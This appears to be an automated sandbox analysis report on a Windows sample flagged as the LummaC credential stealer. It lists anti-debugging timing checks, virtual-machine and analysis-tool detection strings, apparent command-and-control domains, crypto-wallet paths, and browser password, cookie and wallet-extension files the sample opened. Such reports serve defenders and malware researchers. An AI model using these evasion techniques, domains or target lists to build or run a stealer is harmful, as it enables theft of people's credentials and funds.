Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0740 second address: 4EC07F4 instructions: 0x00000000 rdtsc 0x00000002 call 00007F86A0EA8107h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007F86A0EA8109h 0x00000010 and ecx, 20C399C6h 0x00000016 jmp 00007F86A0EA8101h 0x0000001b popfd 0x0000001c popad 0x0000001d mov dword ptr [esp], ebp 0x00000020 jmp 00007F86A0EA80FEh 0x00000025 mov ebp, esp 0x00000027 pushad 0x00000028 call 00007F86A0EA80FEh 0x0000002d mov ecx, 4DC081F1h 0x00000032 pop esi 0x00000033 mov edi, 2CA65562h 0x00000038 popad 0x00000039 push esp 0x0000003a pushad 0x0000003b mov bh, ah 0x0000003d call 00007F86A0EA8101h 0x00000042 push eax 0x00000043 pop edx 0x00000044 pop esi 0x00000045 popad 0x00000046 mov dword ptr [esp], esi 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c jmp 00007F86A0EA8104h 0x00000051 movzx eax, bx 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC07F4 second address: 4EC080D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A191947Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC080D second address: 4EC0811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0811 second address: 4EC0817 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0817 second address: 4EC0859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F86A0EA8102h 0x00000009 sub cx, BBE8h 0x0000000e jmp 00007F86A0EA80FBh 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test esi, esi 0x0000001b pushad 0x0000001c mov ch, 4Dh 0x0000001e mov bx, D2E2h 0x00000022 popad 0x00000023 je 00007F8712935C60h 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0859 second address: 4EC085D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC085D second address: 4EC0863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0863 second address: 4EC0908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 call 00007F86A1919484h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f cmp dword ptr [769B459Ch], 05h 0x00000016 pushad 0x00000017 push edx 0x00000018 pushfd 0x00000019 jmp 00007F86A191947Ah 0x0000001e adc eax, 655773D8h 0x00000024 jmp 00007F86A191947Bh 0x00000029 popfd 0x0000002a pop eax 0x0000002b pushfd 0x0000002c jmp 00007F86A1919489h 0x00000031 jmp 00007F86A191947Bh 0x00000036 popfd 0x00000037 popad 0x00000038 je 00007F87133BF03Eh 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007F86A1919484h 0x00000045 adc al, FFFFFF98h 0x00000048 jmp 00007F86A191947Bh 0x0000004d popfd 0x0000004e mov ecx, 75414E4Fh 0x00000053 popad 0x00000054 xchg eax, esi 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 push ebx 0x00000059 pop ecx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0908 second address: 4EC090D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC090D second address: 4EC0926 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F86A1919485h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0926 second address: 4EC096B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A0EA8101h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d call 00007F86A0EA8107h 0x00000012 pop edi 0x00000013 mov dx, ax 0x00000016 popad 0x00000017 xchg eax, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F86A0EA80FDh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0A2B second address: 4EC0A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 3D75CB74h 0x00000008 pushfd 0x00000009 jmp 00007F86A191947Dh 0x0000000e or al, 00000036h 0x00000011 jmp 00007F86A1919481h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F86A1919488h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0A76 second address: 4EC0A7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0A7C second address: 4EC0A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0A82 second address: 4EC0A86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 29EF30 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 4410C0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 4698FE instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 3532	Thread sleep time: -210000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5204	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: file.exe, file.exe, 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: file.exe, 00000000.00000002.2273459745.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2273459745.000000000102E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: file.exe, 00000000.00000003.2191192394.000000000598C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: file.exe, 00000000.00000002.2273459745.000000000102E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW32
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: file.exe, 00000000.00000003.2191192394.0000000005986000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00280F10 LdrInitializeThunk,

0_2_00280F10

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: file.exe	String found in binary or memory: scriptyprefej.store
Source: file.exe	String found in binary or memory: navygenerayk.store
Source: file.exe	String found in binary or memory: founpiuer.store
Source: file.exe	String found in binary or memory: necklacedmny.store
Source: file.exe	String found in binary or memory: thumbystriw.store
Source: file.exe	String found in binary or memory: fadehairucw.store
Source: file.exe	String found in binary or memory: crisiwarny.store
Source: file.exe	String found in binary or memory: presticitpo.store

Source: file.exe, file.exe, 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: joProgram Manager

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: file.exe, 00000000.00000003.2245519986.000000000593B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235266820.0000000001097000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2274003622.0000000001097000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235383911.0000000001097000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2245823719.0000000001093000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2267954698.000000000593D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 4872, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000003.2177937623.000000000108B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: file.exe, 00000000.00000003.2177937623.000000000108B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: file.exe	String found in binary or memory: Jaxx Liberty
Source: file.exe, 00000000.00000003.2177937623.000000000108B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: file.exe, 00000000.00000003.2223571399.0000000001095000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: file.exe, 00000000.00000003.2223571399.0000000001095000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe, 00000000.00000003.2223571399.0000000001095000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
